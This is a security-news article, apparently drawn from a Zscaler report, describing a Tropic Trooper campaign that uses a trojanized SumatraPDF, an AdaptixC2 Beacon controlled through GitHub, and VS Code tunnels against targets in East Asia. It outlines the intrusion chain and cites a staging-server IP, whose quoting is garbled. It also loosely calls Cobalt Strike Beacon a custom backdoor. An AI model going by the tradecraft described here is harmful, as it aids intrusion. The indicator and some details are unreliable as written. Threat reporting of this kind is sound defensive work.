Chinese-speaking individuals have been targeted in a new campaign that uses a trojanized version of the SumatraPDF reader to deploy the AdaptixC2 Beacon post-exploitation agent and ultimately facilitate the exploitation of Microsoft Visual Studio Code (VS Code) tunnels for remote access.
Zscaler ThreatLabz, which discovered the campaign last month, says with high confidence that it is the work of Tropic Trooper (also known as APT23, Earth Centaur, KeyBoy, and Pirate Panda), a hacker group known for targeting various organizations in Taiwan, Hong Kong, and the Philippines. It is estimated that it has been active since at least 2011.
“The attackers used GitHub as a command-and-control (C2) platform to create a custom AdaptixC2 Beacon listener,” security researcher Ying Hong Zhang said in an analysis.
Chinese-speaking individuals in Taiwan and individuals in South Korea and Japan are believed to be targeted by the campaign. The starting point of the attack is a ZIP archive containing a military-themed document lure to launch a malicious version of SumatraPDF. This document is used to display a decoy PDF document while also retrieving encrypted shellcode from the staging server to launch the AdaptixC2 Beacon.
To accomplish this, the backdoored SumatraPDF executable launches a slightly modified version of the loader codenamed TOSHIS. This is a variant of Xiangoop, a Tropic Trooper-linked malware that has been used in the past to fetch next-stage payloads such as the Cobalt Strike Beacon and the Mythic framework’s Merlin agent.
The loader is responsible for activating a multi-stage attack and dropping both the lure document as a distraction mechanism and the AdaptixC2 beacon agent in the background. The agent uses GitHub for its C2 and sends beacons to attacker-controlled infrastructure to retrieve tasks to be executed on compromised hosts.
The attack only advances to the next stage if the victim is deemed worthy. At that point, the threat actor deploys VS Code and sets up a VS Code tunnel for remote access. On some machines, attackers have been found to have installed another Trojanized application. This is likely to better camouflage their actions.
Additionally, the staging server involved in the compromise (“158.247.193”)[.]100″) has been observed hosting custom backdoors called Cobalt Strike Beacon and EntryShell, both of which have been used by Tropic Troopers in the past.
“Similar to the TAOTH campaign, a publicly available backdoor is used as the payload,” Zscaler said. “Previously Cobalt Strike Beacon and Mythic Merlin were used, but threat actors are now moving to AdaptixC2.”
Source link
